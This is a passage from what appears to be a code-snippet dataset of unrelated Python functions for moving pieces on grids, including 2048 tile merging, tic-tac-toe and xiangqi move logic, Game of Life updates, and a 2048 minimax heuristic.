doesn't move\n directionalMovement = (0,0)\n else :\n self.targetLocation = self.getRandomPassableLocation()\n # return the directional movement\n return directionalMovement", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except 
IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def getMove(self, grid):\n\t\tmove = self.performIterativeDepthSearch(grid)\n\t\tendtime = time.clock()\n\t\t#print (endtime - starttime)\n\t\treturn move", "def move(self, direction):\n\n # Move to the right\n if direction == 'right':\n if self.square_x < (NUMBER_OF_SPRITES -1):\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y][self.square_x + 1] != 'w':\n # Move by one square right on X axis\n self.square_x += 1\n # Calculation of the \"Real\" positioning in pixels\n self.x_pos = self.square_x * SPRITES_SIZE\n\n # Move to the left\n if direction == 'left':\n if self.square_x > 0:\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y][self.square_x - 1] != 'w':\n # Move by one square left on X axis\n self.square_x -= 1\n # Calculation of the \"Real\" positioning in pixels\n self.x_pos = self.square_x * SPRITES_SIZE\n\n # Move up\n if direction == 'up':\n if self.square_y > 0:\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y-1][self.square_x] != 'w':\n # Move by one square up on Y axis\n self.square_y -= 1\n # Calculation of the \"Real\" positioning in pixels\n self.y_pos = self.square_y * SPRITES_SIZE\n\n # Move down\n if direction == 'down':\n if self.square_y < (NUMBER_OF_SPRITES -1):\n # Checking if the new direction is not a wall\n if self.maze.structure[self.square_y + 1][self.square_x] != 'w':\n # Move by one square down on Y axis\n self.square_y += 1\n # Calculation of the \"Real\" positioning in pixels\n self.y_pos = self.square_y * SPRITES_SIZE", "def apply_move(cell, x, y):\r\n x2 = (co_ords[cell])[0] + x\r\n y2 = (co_ords[cell])[1] + y\r\n return (x2, y2)", "def advance(self,distance = 1):\n colOffset = 0\n rowOffset = 0\n if self.currentOrientation == GridOrientation.left:\n colOffset = -1 * distance\n if self.currentOrientation == GridOrientation.right:\n colOffset = distance\n if self.currentOrientation == GridOrientation.down:\n rowOffset = -1 * distance\n if self.currentOrientation == GridOrientation.up:\n rowOffset = distance\n self.currentCol += colOffset\n self.currentRow += rowOffset\n \n #See if we've expanded the grid\n if self.currentCol > self.maxCol:\n self.maxCol = self.currentCol\n if self.currentCol < self.minCol:\n self.minCol = self.currentCol\n if self.currentRow > self.maxRow:\n self.maxRow = self.currentRow\n if self.currentRow < self.minRow:\n self.minRow = self.currentRow\n \n return self.getCoordinate()", "def new_move(self, grid_x, grid_y, player):\n #duplication /!\\\n if player == self.X:\n self.draw_X(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.X\n\n elif player == self.O:\n self.draw_O(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.O", "def move(self, direction):\n no_change = True\n if direction == UP or direction == DOWN:\n other_direction = self.get_grid_height()\n elif direction == LEFT or direction == RIGHT:\n other_direction = self.get_grid_width()\n for first_index in self._indices[direction]:\n row = first_index[0]\n col = first_index[1]\n line = []\n for _ in range(other_direction):\n 
line.append(self.get_tile(row, col))\n row += OFFSETS[direction][0]\n col += OFFSETS[direction][1]\n merged_line = merge(line)\n \n if merged_line != line:\n no_change = False\n \n row = first_index[0]\n col = first_index[1]\n for idx in range(other_direction):\n self.set_tile(row, col, merged_line[idx])\n row += OFFSETS[direction][0]\n col += OFFSETS[direction][1]\n if no_change == False: \n self.new_tile()", "def move(self, direction):\r\n # replace with your code\r\n row_dir = OFFSETS[direction][0]\r\n col_dir = OFFSETS[direction][1]\r\n \r\n if row_dir == 0:\r\n new_cells = self._cells\r\n new_dir = col_dir\r\n else:\r\n new_tuples = zip(*self._cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n new_dir = row_dir\r\n \r\n tmp_cells = []\r\n for lists in new_cells:\r\n lists = lists[::new_dir]\r\n merge_lists = merge(lists)\r\n tmp_cells.append(merge_lists[::new_dir])\r\n \r\n if row_dir == 0:\r\n self._cells = tmp_cells\r\n else:\r\n new_tuples = zip(*tmp_cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n self._cells = new_cells\r\n \r\n self.new_tile()", "def move(self, direction):\r\n # replace with your code\r\n initial_tile = self.__direct_top[direction]\r\n offset = OFFSETS[direction]\r\n direct_range = self.__direct_range[direction] \r\n backup_list = [[0 for dummy_col in range(self.grid_width)] for dummy_row in range(self.grid_height)]\r\n \r\n for initial_count, tile_cursor in enumerate(initial_tile):\r\n tem_list = []\r\n grid_cursor = tile_cursor\r\n for dummy_cursor in range(direct_range):\r\n \r\n tem_list.append(self.grid[grid_cursor[0]][grid_cursor[1]])\r\n grid_cursor = tuple(x + y for x,y in zip(grid_cursor,offset))\r\n \r\n new_list = merge(tem_list)\r\n if self.update_dict[direction] == 0:\r\n for col_cursor in range(direct_range):\r\n backup_list[col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] == 1: \r\n for col_cursor in range(direct_range):\r\n backup_list[self.grid_height -1 - col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] ==3:\r\n backup_list[initial_count] = new_list\r\n else:\r\n for col_cursor in range(direct_range):\r\n backup_list[initial_count][self.grid_width -1 - col_cursor] = new_list[col_cursor]\r\n \r\n flag = (self.grid == backup_list)\r\n self.grid = backup_list\r\n if not flag:\r\n self.new_tile()", "def move(self, direction):\r\n\r\n # ternary operator setting dimension variable\r\n dim = self.get_grid_width() if (direction == \"LEFT\" or direction ==\r\n \"RIGHT\") else self.get_grid_height()\r\n self.get_row(direction, dim)\r\n self.new_tile()", "def make_move(grid, n_columns, n_rows):\r\n # Generate the game grid to be manipulated\r\n new_grid = [[0] * (n_columns + 1) for i in range(n_rows + 1)]\r\n\r\n\r\n for i in range(n_rows):\r\n for j in range(n_columns):\r\n upper_left = grid[i-1][j-1] # neighbor to upper left of cell of interest\r\n upper = grid[i-1][j] # neighbor above cell of interest\r\n upper_right = grid[i-1][j+1] # neighbor to upper right of cell of interest\r\n left = grid[i][j-1] # neighbor to left of cell of interest\r\n right = grid[i][j+1] # neighbor to right of cell of interest\r\n bot_left = grid[i+1][j-1] # neighbor to bottom left cell of interest\r\n bot = grid[i+1][j] # neighbor below cell of interest\r\n bot_right = grid[i+1][j+1] # neighbor to bottom right of cell of interest\r\n\r\n # sum of the state of all neighbors\r\n on_neighbors = upper_left + upper + upper_right + left + right + bot_left + bot + 
bot_right\r\n\r\n # Any ON cell with fewer than two ON neighbors turns OFF\r\n if grid[i][j] == 1 and on_neighbors < 2:\r\n new_grid[i][j] = 0\r\n\r\n # Any ON cell with two or three ON neighbours stays ON\r\n elif grid[i][j] == 1 and (on_neighbors == 2 or on_neighbors == 3):\r\n new_grid[i][j] = 1\r\n\r\n # Any ON cell with more than three ON neighbors turns OFF\r\n elif grid[i][j] == 1 and on_neighbors > 3:\r\n new_grid[i][j] = 0\r\n\r\n # Any OFF cell with three ON neighbors turns ON\r\n elif grid[i][j] == 0 and on_neighbors == 3:\r\n new_grid[i][j] = 1\r\n\r\n return new_grid #manipulated game grid\r", "def move(self, direction):\n command = self.DIRECTIONS[direction][\"command\"]\n mem, out = self.cpu.run_program(inputs=[command])\n status = out.pop()\n if status in (1, 2):\n self.position = Point(\n self.position.x + self.DIRECTIONS[direction][\"mask\"][0],\n self.position.y + self.DIRECTIONS[direction][\"mask\"][1]\n )\n if self.display:\n self.draw_grid()\n sleep(self.delay)\n return status", "def make_move(self):\n self.owner = self.game.current_turn\n self.status = 'X' if self.owner == self.game.creator else 'O'\n ####\n #Random turn??\n ####\n self.save(update_fields=['status', 'owner'])\n\n # Add log entry for move\n self.game.add_log(f'cell made at ({self.row}, {self.col}) by {self.owner}')\n\n # Set the current turn for the other player if game is not over\n # Check if find winner\n if self.game.check_win(cell=self) or\\\n self.game.get_all_game_cells().filter(status='EMPTY').count() == 0:\n print(\"Winnnnnnnn\")\n self.game.mark_complete(winner=self.owner)\n\n # Switch player turn\n self.game.switch_turn()\n\n # Let the game know about the move and result\n self.send_game_update()", "def move(self):\n \"\"\" Responsible for transformations \"\"\"\n pos, com, success = self.perception \n if self.destination is None:\n return array([0,0])\n\n if not self.awake:\n return array([0,0])\n\n\n if self.phase == 4 and self.proper_formation is not None:\n no_go = []\n for i in range(0,len(self.proper_formation)):\n if i != self.order and self.proper_formation[i][0] == self.proper_formation[self.order][0]:\n no_go.append(self.transform(self.proper_formation[i][1] - self.position))\n pos = merge_array_lists(pos, no_go)\n\n if self.phase == 2:\n point = self.destination.copy() - self.position\n elif self.phase > 2:\n point = self.transform(self.destination.copy() - self.position)\n else:\n point = self.destination.copy()\n\n if not array_equal(point, array([0,0])):\n reachable, path = findpathtoclosest(array([0,0]), point, pos)\n \n if len(path) == 0:\n move = array([0,0]) \n else:\n move = path[0]\n if not reachable and not array_equal(move,array([0,0])):\n if self.phase == 2:\n self.closest_i_could_get = path[-1] + self.position\n elif self.phase > 2:\n self.closest_i_could_get = self.transform2(path[-1]) + self.position\n else:\n self.closest_i_could_get = path[-1]\n elif not reachable:\n if self.phase > 1:\n self.closest_i_could_get = self.position\n else:\n self.closest_i_could_get = array([0,0])\n else:\n self.closest_i_could_get = None\n\n if reachable and self.phase == 4 and array_equal(move,array([0,0])):\n move = self.randomStep()\n self.closest_i_could_get = None\n\n else:\n move = array([0,0])\n self.closest_i_could_get = None\n\n return move", "def motion(self):\n priority = {\"north\": [-1, 0], \"south\": [1, 0],\n \"east\": [0, 1], \"west\": [0, -1]}\n\n priority_list = [\"north\", \"south\", \"east\", \"west\"]\n\n critical_point = False\n while critical_point is False:\n 
row = self.curr_cell.row\n column = self.curr_cell.col\n\n if self.allow_to_move(priority_list[0],\n row + priority[priority_list[0]][0],\n column + priority[priority_list[0]][1]):\n\n self.move(priority_list[0])\n\n elif self.allow_to_move(priority_list[1],\n row + priority[priority_list[1]][0],\n column + priority[priority_list[1]][1]):\n\n self.move(priority_list[1])\n\n elif self.allow_to_move(priority_list[2],\n row + priority[priority_list[2]][0],\n column + priority[priority_list[2]][1]):\n\n self.move(priority_list[2])\n\n elif self.allow_to_move(priority_list[3],\n row + priority[priority_list[3]][0],\n column + priority[priority_list[3]][1]):\n\n self.move(priority_list[3])\n\n else:\n # Robot isolated\n critical_point = True\n\n return self.curr_cell, self.path", "def move(self, direction):\r\n # we are initializing the required variables\r\n num_steps=0\r\n if direction== UP or direction==DOWN:\r\n num_steps=self._height\r\n if direction==LEFT or direction==RIGHT:\r\n num_steps=self._width\r\n move_in=OFFSETS[direction]\r\n temp_list=[]\r\n moved=False \r\n # merging the list in the particular direction\r\n for start_cell in self._initial_cells[direction]:\r\n for step in range(num_steps):\r\n row = start_cell[0] + step * move_in[0]\r\n col = start_cell[1] + step * move_in[1]\r\n # creating a list of all the columns and rows in that direction \r\n temp_list.append(self._grid[row][col])\r\n # calling the merge function to calculate the resultant list\r\n merged_list=merge(temp_list)\r\n # putting back the resultant list\r\n for step in range(num_steps):\r\n row = start_cell[0] + step * move_in[0]\r\n col = start_cell[1] + step * move_in[1]\r\n self._grid[row][col]=merged_list[step]\r\n # checking for any changes in the board\r\n if temp_list!=merged_list:\r\n moved=True\r\n temp_list=[]\r\n #adding a new tile\r\n if moved:\r\n self.new_tile()", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def move(self, direction):\n # We will add a new tile only if something has moved\n moved = False\n \n # We may extract a row or a column.\n loop_length = self._height + self._width \\\n - len(self._initial_tiles[direction])\n \n # Offsets for grid traversal\n row_off, col_off = OFFSETS[direction]\n \n for row, col in self._initial_tiles[direction]:\n # Computing positions of tiles to extract\n pos_list = [(row + index * row_off, \n col + index * col_off) \n for index in xrange(loop_length)]\n \n # Getting values from the grid and merging\n extracted_list = [self.get_tile(*pos) for pos in pos_list]\n merge_list = merge(extracted_list)\n \n # We modify the grid only if it has changed\n for pos, val_1, val_2 in zip(pos_list, extracted_list, merge_list):\n if val_1 - val_2:\n self.set_tile(*pos, value = val_2)\n moved = True\n \n # Any changes?\n if moved:\n self.new_tile()", "def make_move(self, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n if self.stat_brain.all_valid(tower) == 0 or self.stat_brain.is_valid(height, index, tower):\r\n return height, index\r\n else:\r\n while not self.stat_brain.is_valid(height, index, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n return height, index", "def update(self, move):\n\n if not 0 <= move < 7:\n raise InvalidMove\n\n placed 
= False\n x = None\n y = None\n\n for row in reversed(xrange(self._rows)):\n if not self._board[row][move]:\n self._board[row][move] = self.current_player\n placed = True\n x = move\n y = row\n break\n\n if not placed:\n raise InvalidMove\n\n return (x, y)", "def move(self, row: int, col: int, player: int):\n def addup(dict_name, invalid_set, another_invalid, locx, locy):\n if locx == locy:\n diag_name = (1,1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n if locx == self.tar-1-locy:\n diag_name = (-1, -1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n curcol = (locy, None)\n currow = (None, locx)\n if curcol not in invalid_set:\n dict_name[curcol] += 1\n if dict_name[curcol] == self.tar:\n return player\n another_invalid.add(curcol)\n if currow not in invalid_set:\n dict_name[currow] += 1\n if dict_name[currow] == self.tar:\n return player\n another_invalid.add(currow)\n return 0\n res = 0\n if (row, col) not in self.walked:\n if player == 1:\n res = addup(self.p1, self.invalid_1, self.invalid_2, row, col)\n if player == 2:\n res = addup(self.p2, self.invalid_2, self.invalid_1, row, col)\n self.walked.add((row, col))\n return res", "def move_agent(self, state):\n m = self.m\n n = self.n\n\n cur_env = deepcopy(state.grid)\n cur_env[m, n] = 0\n action = self.choose_action(state)\n\n if action == 'Right':\n if n + 1 >= grid_size or cur_env[m][n+1] != 0:\n Rew = -2 # Reward -2 if we move into a wall or another agent\n self.collisions += 1\n else:\n n += 1\n Rew = -0.1 # Reward -0.1 otherwise\n a = 0 # Action number\n elif action == 'Left':\n if n - 1 < 0 or cur_env[m][n-1] != 0:\n Rew = -2\n self.collisions += 1\n else:\n n -= 1\n Rew = -0.1\n a = 1\n elif action == 'Up':\n if m - 1 < 0 or cur_env[m-1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m -= 1\n Rew = -0.1\n a = 2\n elif action == 'Down':\n if m + 1 >= grid_size or cur_env[m+1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m += 1\n Rew = -0.1\n a = 3\n\n m = m % grid_size\n n = n % grid_size\n self.m = m # Update position of agent\n self.n = n # Update position of agent\n cur_env[m][n] = 1 # Update grid\n new_state = State(cur_env, [m, n]) # Set new state\n terminal = False\n\n if [m, n] == self.end:\n Rew = 10\n terminal = True\n self.carry = True\n\n return new_state, a, Rew, terminal", "def move(self, board):\n\n if board.get_number_of_moves() == 0:\n random_row = randint(0, 2)\n random_column = randint(0, 2)\n\n if random_row == 1 or random_column == 1:\n random_row = 1\n random_column = 1\n elif random_row == 2:\n random_row = board.get_dimension()-1\n\n if random_column == 2:\n random_column = board.get_dimension()-1\n\n move = (random_row, random_column)\n elif board.get_number_of_moves() == 1 or board.get_number_of_moves() == 2:\n if board.get_piece(1,1) == ' ':\n move = (1, 1)\n else:\n board_dimension = board.get_dimension()-1\n corners = [(0, 0), (0, board_dimension), (board_dimension, 0), (board_dimension, board_dimension)]\n corners = self.remove_filled_positions(corners, board)\n\n move = corners[randint(0, len(corners)-1)]\n else:\n move = self.check_for_winner(board)\n\n if move == (-1, -1):\n board_dimension = board.get_dimension()-1\n corner1_moves = self.remove_filled_positions([(0, 0), (2, 2)], board)\n corner2_moves = self.remove_filled_positions([(0, 2), (2, 0)], board)\n\n non_corner_moves = 
self.remove_filled_positions([(1, 0), (2, 1), (1, 2), (0, 1)], board)\n\n center_piece = board.get_piece(1, 1)\n corner_pieces = [board.get_piece(0, 0), board.get_piece(board_dimension, 0), board.get_piece(0, board_dimension), board.get_piece(board_dimension, board_dimension)]\n\n if corner_pieces[0] != self._piece and corner_pieces[0] != ' ' and corner_pieces[0] == corner_pieces[3]:\n move = non_corner_moves[randint(0, 3)]\n elif corner_pieces[1] != self._piece and corner_pieces[1] != ' ' and corner_pieces[1] == corner_pieces[2]:\n move = non_corner_moves[randint(0, 3)]\n elif len(corner2_moves) > 0 and corner_pieces[0] != self._piece and corner_pieces[0] == center_piece and corner_pieces[3] == self._piece:\n move = corner2_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[1] != self._piece and corner_pieces[1] == center_piece and corner_pieces[2] == self._piece:\n move = corner1_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[2] != self._piece and corner_pieces[2] == center_piece and corner_pieces[1] == self._piece:\n move = corner1_moves[0]\n elif len(corner2_moves) > 0 and corner_pieces[3] != self._piece and corner_pieces[3] == center_piece and corner_pieces[0] == self._piece:\n move = corner2_moves[0]\n else:\n move = self.can_complete_two_in_row(board)\n\n if move == (-1, -1):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def move(coord, direction):\n vInc, hInc = dirToIncrement(direction)\n return (coord[0]+vInc, coord[1]+hInc)", "def move(self, rel_pos):\n self.pos = (self.pos[0] + rel_pos[0] * GRID, self.pos[1] + rel_pos[1] * GRID)", "def try_move(self, direction=None):\n if direction == 'rotate':\n return (self.origin, self.simple_rotate())\n else:\n return (self.get_new_origin(direction=direction), self.positions)", "def move(self, board):\n\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def move(self, direction):\r\n direc = list(OFFSETS[direction])\r\n line = []\r\n dummy_board = self.board[:]\r\n if direction == 3:\r\n for i in range(self.height):\r\n self.board[i] = merge(self.board[i])\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n elif direction == 4:\r\n for i in range(self.height):\r\n line = self.board[i][::-1]\r\n self.board[i] = merge(line)\r\n self.board[i] = self.board[i][::-1]\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n \r\n elif direction == 1 or 2:\r\n dummy_board = str(self.board[:])\r\n if direction == 1:\r\n tile = [0,0]\r\n elif direction == 2:\r\n tile = [self.height - 1, 0]\r\n for i in range(self.width):\r\n tile2 = tile[:]\r\n while len(line) < self.height:\r\n line.append(self.get_tile(*tile2))\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n line = merge(line)\r\n tile2 = tile[:]\r\n for i in range(self.height):\r\n self.set_tile(*(tile2+[line[0]]))\r\n line.remove(line[0])\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n tile = [x+y for x,y in zip(tile, [0,1])]\r\n if dummy_board != self.__str__():\r\n self.new_tile()\r\n return self.board", "def move(self, coordinates, direction):\n pass", "def get_move(self, direction):\n pos = self._state.index(0)\n row = pos // self._size\n col = pos % self._size\n moves = 
get_moves(self._size, col, row)\n new_state = self._state\n if direction in moves:\n if moves[direction]['is_movable']:\n new_state = move(self._state, pos, moves[direction]['rel_pos'])\n return Node(new_state, heuristic=self._heuristic,\n g_score=self._g_score+self._cost(self._state, new_state))", "def _move_receptor_to_grid_center(self):\n lower_receptor_corner = np.array([self._crd[:,i].min() for i in range(3)], dtype=float)\n upper_receptor_corner = np.array([self._crd[:,i].max() for i in range(3)], dtype=float)\n \n receptor_box_center = (upper_receptor_corner + lower_receptor_corner) / 2.\n grid_center = (self._origin_crd + self._uper_most_corner_crd) / 2.\n displacement = grid_center - receptor_box_center\n\n print(\"Receptor is translated by \", displacement)\n\n for atom_ind in range(len(self._crd)):\n self._crd[atom_ind] += displacement\n return None", "def get_new_position(cls, position_x, position_y, direction):\n new_position_x = cls.calculate_position_x(position_x, direction)\n new_position_y = cls.calculate_position_y(position_y, direction)\n return new_position_x, new_position_y", "def get_move(self, board):\n # First, check if we can win in the next move\n winning_move = self.get_winning_move(board, self.letter)\n if winning_move is not None:\n return winning_move\n # Check if the player could win on their next move, and block them.\n blocking_move = self.get_winning_move(board, self.opponent_letter)\n if blocking_move is not None:\n return blocking_move\n # Try to take one of the corners, if they are free.\n corner_move = self.move_in_a_corner(board)\n if corner_move is not None:\n return corner_move\n # Try to take the center, if it is free.\n if board.size % 2 == 1:\n if board.is_position_availible(board.letters[board.size // 2]\n + board.numbers[board.size // 2]):\n return board.letters[board.size // 2] + board.numbers[board.size // 2]\n # Move on one of the sides.\n return self.choose_random_move_from_list(board, list(board.positions.keys()))", "def move(self, direction: Direction) -> \"TilePosition\":\r\n return TilePosition(self.tile_x + direction.dx, self.tile_y + direction.dy)", "def move(self, direction):\r\n \r\n tiles_changed = False\r\n \r\n #create a list for the values of the initial tile\r\n #depending the direction\r\n if direction == UP or direction == DOWN:\r\n num_steps = self._grid_height\r\n else:\r\n num_steps = self._grid_width\r\n \r\n #iterate through the cells depending the direction\r\n for each_cell in self._initial_indices[direction]:\r\n \r\n cell_value_list = []\r\n #take the values of the cells\r\n for step in range(num_steps):\r\n row = each_cell[0] + step * OFFSETS[direction][0]\r\n col = each_cell[1] + step * OFFSETS[direction][1]\r\n cell_value_list.append(self._cells[row][col])\r\n \r\n #merge the list created above\r\n merged_list = merge(cell_value_list)\r\n \r\n #check if the values have changed\r\n if merged_list != cell_value_list:\r\n tiles_changed = True\r\n \r\n #put the merged list int the grid \r\n for step in range(num_steps):\r\n row = each_cell[0] + step * OFFSETS[direction][0]\r\n col = each_cell[1] + step * OFFSETS[direction][1]\r\n self.set_tile(row, col, merged_list[step])\r\n \r\n if tiles_changed:\r\n self.new_tile()", "def update_grid(self):\n # Check to see if we have moved squares\n _new_grid = self.calc_grid()\n if _new_grid == self._grid:\n return\n # Remove from old square and add to new square\n self.target._grid[self._grid][self._type].discard(self)\n self.target._grid[_new_grid][self._type].add(self)\n # 
Update coordinates\n self._grid = _new_grid", "def move(self, direction):\r\n # replace with your code\r\n row_increment = OFFSETS[direction][0]\r\n col_increment = OFFSETS[direction][1]\r\n changed = False\r\n for header in self._grid_headers[direction]:\r\n row_header = header[0]\r\n col_header = header[1]\r\n source_line = []\r\n # get the source line first\r\n while (row_header >= 0) and (col_header >= 0) and (row_header < self._grid_height) and (col_header < self._grid_width):\r\n source_line.append(self.get_tile(row_header, col_header))\r\n row_header += row_increment\r\n col_header += col_increment\r\n # merge\r\n result_line = merge(source_line)\r\n # write the result back\r\n row_header = header[0]\r\n col_header = header[1]\r\n result_line_index = 0\r\n while (row_header >= 0) and (col_header >= 0) and (row_header < self._grid_height) and (col_header < self._grid_width):\r\n self.set_tile(row_header, col_header, result_line[result_line_index])\r\n if result_line[result_line_index] != source_line[result_line_index]:\r\n changed = True\r\n result_line_index += 1\r\n row_header += row_increment\r\n col_header += col_increment\r\n if changed:\r\n self.new_tile()", "def make_move(self, playername, coordinates, direction):\n\n pass", "def make_move(self, start, end):\r\n start_pos = self.parse_pos(start) # Start and end position are lists that contain column and row\r\n end_pos = self.parse_pos(end)\r\n\r\n start_row = start_pos[0] # Position of row and columns are assigned to variables\r\n start_col = start_pos[1]\r\n end_row = end_pos[0]\r\n end_col = end_pos[1]\r\n\r\n board = self._board.get_board()\r\n start_piece = board[start_row][start_col].get_piece()\r\n end_piece = board[end_row][end_col].get_piece()\r\n\r\n\r\n # If there is no piece to be moved or game is over or piece is to be moved to its original location\r\n if start_piece is None or self._game_state != \"UNFINISHED\"\\\r\n or (start_row == end_row and start_col == end_col):\r\n return False\r\n\r\n start_piece_id = start_piece.get_player_id() # Contains the player id associated with the piece\r\n end_piece_player_id = None\r\n if end_piece is not None: # Executes if end piece contains a piece object\r\n end_piece_player_id = end_piece.get_player_id()\r\n\r\n # If Red's turn\r\n if self._player_turn == 1:\r\n if start_piece_id != 'r': # If red moves a black piece\r\n return False\r\n if start_piece.is_legal_move(start, end, start_piece, end_piece_player_id, board) : # Checks the legal move conditions\r\n if self.move_piece(start, end): # Returns False if move is invalid\r\n # Checks if move violates flying general and puts self in check\r\n if self.is_not_flying_general() is True and self.is_in_check(\"red\") is False:\r\n self.change_player_turn()\r\n self.is_in_checkmate()\r\n return True\r\n else: # Reverses the move if violates flying general rule\r\n self.reverse_move(start, end, board,end_piece_player_id, end_piece)\r\n return False\r\n\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n # If Black's turn\r\n elif self._player_turn == -1:\r\n if start_piece_id != 'b': # If black moves a red piece\r\n return False\r\n if start_piece.is_legal_move(start, end, start_piece, end_piece_player_id, board): # Checks the legal move conditions\r\n if self.move_piece(start, end): # Returns False if move is invalid\r\n if self.is_not_flying_general() is True and self.is_in_check(\"black\") is False:\r\n self.change_player_turn()\r\n self.is_in_checkmate()\r\n return True\r\n else: # Reverses the move if violates 
flying general rule\r\n self.reverse_move(start, end, board, end_piece_player_id, end_piece)\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False", "def getMove(self, grid):\n# global prune\n# prune = 0\n def Terminal(stateTup):\n \"\"\"\n Checks if the node is a terminal node\n Returns eval(state) if it is terminal\n \"\"\"\n state = stateTup[0]\n maxDepth = self.depthLimit\n if stateTup[1] == maxDepth:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n elif len(stateTup[0].getAvailableMoves()) == 0:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n\n def Eval(state):\n \"\"\"\n This is the eval function which combines many heuristics and assigns\n weights to each of them\n Returns a single value\n \"\"\"\n\n# H1 = htest2(state)\n# return H1\n H2 = h1(state)*monotonic(state)\n return H2\n\n\n def h1(state):\n Max = state.getMaxTile()\n left = len(state.getAvailableCells())/16\n if state.getCellValue([0,0]) == Max:\n v = 1\n else:\n v= 0.3\n Max = Max/1024\n return Max*left*v\n\n def mono(state):\n mon = 0\n# for i in range(4):\n# row = 0\n# for j in range(3):\n# if state.map[i][j] > state.map[i][j+1]:\n# row+=1\n# if row == 4:\n# mon += 1\n# for i in range(4):\n# column = 0\n# for j in range(3):\n# if state.map[j][i] > state.map[j+1][i]:\n# column +=1\n# if column == 4:\n# mon +=1\n#\n#\n# return mon/8\n for i in range(4):\n if all(earlier >= later for earlier, later in zip(grid.map[i], grid.map[i][1:])):\n mon+=1\n\n return mon/8\n\n def monotonic(state):\n cellvals = {}\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n for i in Path1:\n cellvals[i] = state.getCellValue(i)\n mon = 0\n for i in range(4):\n if cellvals.get((i,0)) >= cellvals.get((i,1)):\n if cellvals.get((i,1)) >= cellvals.get((i,2)):\n if cellvals.get((i,2)) >= cellvals.get((i,3)):\n mon +=1\n for j in range(4):\n if cellvals.get((0,j)) >= cellvals.get((1,j)):\n if cellvals.get((1,j)) >= cellvals.get((2,j)):\n if cellvals.get((2,j)) >= cellvals.get((3,j)):\n mon+=1\n return mon/8\n\n\n\n def htest2(state):\n score1 = 0\n score2 = 0\n r = 0.5\n\n Path1 = 